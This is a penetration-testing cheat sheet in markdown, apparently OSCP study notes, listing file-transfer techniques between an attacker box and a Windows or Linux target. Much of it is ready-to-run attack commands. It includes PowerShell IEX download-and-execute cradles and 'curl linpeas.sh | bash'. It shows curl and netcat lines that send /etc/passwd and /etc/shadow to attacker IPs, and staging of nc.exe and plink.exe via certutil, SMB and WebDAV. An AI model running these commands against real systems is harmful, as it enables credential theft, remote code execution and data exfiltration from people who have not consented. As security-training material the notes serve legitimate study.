Skip to content

Latest commit

 

History

History
307 lines (218 loc) · 5.61 KB

file-transfer.md

File metadata and controls

307 lines (218 loc) · 5.61 KB

📁 File Transfer

For more detailed methods: https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/

Use my transfile.sh script from here

Windows

Powershell

Download file

{% code overflow="wrap" %}

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')

{% endcode %}

Download and execute without saving on disk

{% code overflow="wrap" %}

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')

{% endcode %}

To encode using powershell:

{% code title="Decode in linux with base64 -d" overflow="wrap" %}

[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

{% endcode %}

To upload using powershell

{% code overflow="wrap" %}

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

{% endcode %}

{% code title="Use python -m uploadserver on target" %}

Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hosts

{% endcode %}

CMD

certutil -urlcache -f ${file url} filename

powershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exe

Linux and Windows

Python Server

Attacker:

updog -p 80

OR

python3 -m uploadserver

Target:

Download

{% code title="Use PSUpload.ps1" overflow="wrap" %}

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Path\to\file

{% endcode %}

Upload:

{% code overflow="wrap" %}

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

{% endcode %}

To base64 encode:

{% code overflow="wrap" %}

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\to\file' -Encoding Byte))
Invoke-WebRequest -Uri http://<ip>:8000/ -Method POST -Body $b64

{% endcode %}

Apache Server

sudo systemctl start apache2
sudo cp /path/to/file.exe /var/www/html/

{% code title="download from apache server on powershell" %}

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

{% endcode %}

SMB

Attacker:

impacket-smbserver NAME $(pwd) -smb2support -user aditya -password aditya

Target(powershell):

{% code title="Copy files" %}

copy \\192.168.220.133\share\nc.exe

{% endcode %}

{% code title="Authenticated mount" %}

net use n: \\10.10.14.24\share /user:test test

{% endcode %}

or

{% code overflow="wrap" %}

$pass = convertto-securestring 'aditya' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential{'aditya',$pass}
New-PSDrive -Name aditya -PSProvide FileSystem -Credential $cred -Root \\10.10.14.24\aditya
cd aditya:

{% endcode %}

FTP :

  • Attacker : To Host
python -m pyftpdlib 21
  • Target: 
ftp ${IP}

To Upload:

Attacker:

sudo python3 -m pyftpdlib --port 21 --write

Target:

{% code title="Powershell" %}

(New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Path\to\File')

{% endcode %}

{% code title="CMD" %}

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

{% endcode %}

Webdav (If port 445 restrictions present)

Attcker:

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

target:

{% code title="The DavWWWRoot is required in windows" %}

dir \\192.168.49.128\DavWWWRoot

{% endcode %}

{% code title="To upload" %}

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

{% endcode %}

Linux

If no write permissions:

curl 10.10.14.22/linpeas.sh | bash

Bash

#Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80
#HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
#Print the Response
cat <&3

Netcat

To read files:

nc -nv 192.168.49.249 80 < /etc/passwd

To receive:

nc -nlvp 80

Using netcat to send files:

Target

nc -l -p 1234 -q 1 > something.zip < /dev/null

Attack

cat something.zip | netcat <ip> 1234

SSH

If creds are available

scp linenum.sh user@remotehost:/remote/path/

Base64

{% hint style="info" %} Use mf5sum command to verify and file command to check type {% endhint %}

Linux

To get base64 output of the file:

base64 file -w 0

Decrypt

{% code title="file command to validate" %}

echo "base64 string" | base64 -d > file

{% endcode %}

Powershell

{% code title="To verify: Get-FileHash C:\Users\Public\filename -Algorithm md5" overflow="wrap" %}

[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("base64string"))

{% endcode %}